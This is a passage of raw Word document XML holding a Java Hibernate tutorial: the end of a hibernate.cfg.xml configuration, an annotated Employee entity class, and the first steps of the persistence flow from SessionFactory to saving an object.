          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"hibernate.connection.password"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29117CB1"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p>
    <w:p w14:paraId="1EE96626"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;!-- SQL dialect --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B007D18"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sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;property</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"hibernate.dialect"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>org.hibernate.dialect.MySQLDialect</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCBF1E3"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p>
    <w:p w14:paraId="170B6829"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;!-- Mapping files --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA7A671"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sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"com.example.Employee"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A903B5"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sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;/session-factory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532FF5E1" w14:textId="3CC5ED32"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;/hibernate-configuration&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58348EDC" w14:textId="10295EA6" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2. Entity Class Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73597685" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Create a Java class annotated with @Entity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E4C196"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>@Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E369B1"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>@Table</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nam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8800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"employees"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5A68BF"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>publ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class</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Employee</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6A7118C3"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCFE595"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GeneratedValue</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strategy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GenerationType</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IDENTITY</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A73875"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private</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Long</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2DA43D"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p>
    <w:p w14:paraId="510299CA"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Column</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nam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8800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"emp_name"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD2CE4B"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private</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String</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11411360"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p>
    <w:p w14:paraId="089114BB"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private</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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> salary</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D50F05"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p>
    <w:p w14:paraId="48ADF86D"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// Getters and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E8D64D" w14:textId="0C309505"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2945B6" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>3. Persistence Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13643AB3" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Here's the step-by-step persistence flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5730A406" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>a) Create SessionFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3707B1F7"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3886961"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> config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Configuration</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configure</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hibernate.cfg.xml"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B9CC3F" w14:textId="17C6154C"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3886961"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>SessionFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> sessionFactory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config</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buildSessionFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10418F04" w14:textId="0E6E51CF" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>b) Open Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0752E82A" w14:textId="0CE79DAB"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0769607"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> session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sessionFactory</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openSession</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431A21FA" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>c) Begin Transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A29058F" w14:textId="6F3D2259"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8186615"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Transaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> tx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session</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beginTransaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4F01A0" w14:textId="57A05A51" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>d) Create Entity Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8F1CED"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5272555"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> emp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Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365597E0"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5272555"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>emp</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setName</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John Doe"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0CF9F9" w14:textId="57C4F4FC"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5272555"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>emp</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setSalary</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50000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8B231E" w14:textId="77777777" w:rsidR="005F6B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="005F6B6F" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D5147A1" w14:textId="77777777" w:rsidR="0019330C" w:rsidRPr="00CE4B95" w:rsidRDefault="0019330C" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E2D5DC6" w14:textId="57FCF68B" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>e) Save/Persist the Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361FEC73" w14:textId="02D403AB"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446983"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>session</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save</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emp</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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// or session.persist(emp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E74A42D" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>f) Commit Transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F68915" w14:textId="729E744D"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6506379"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
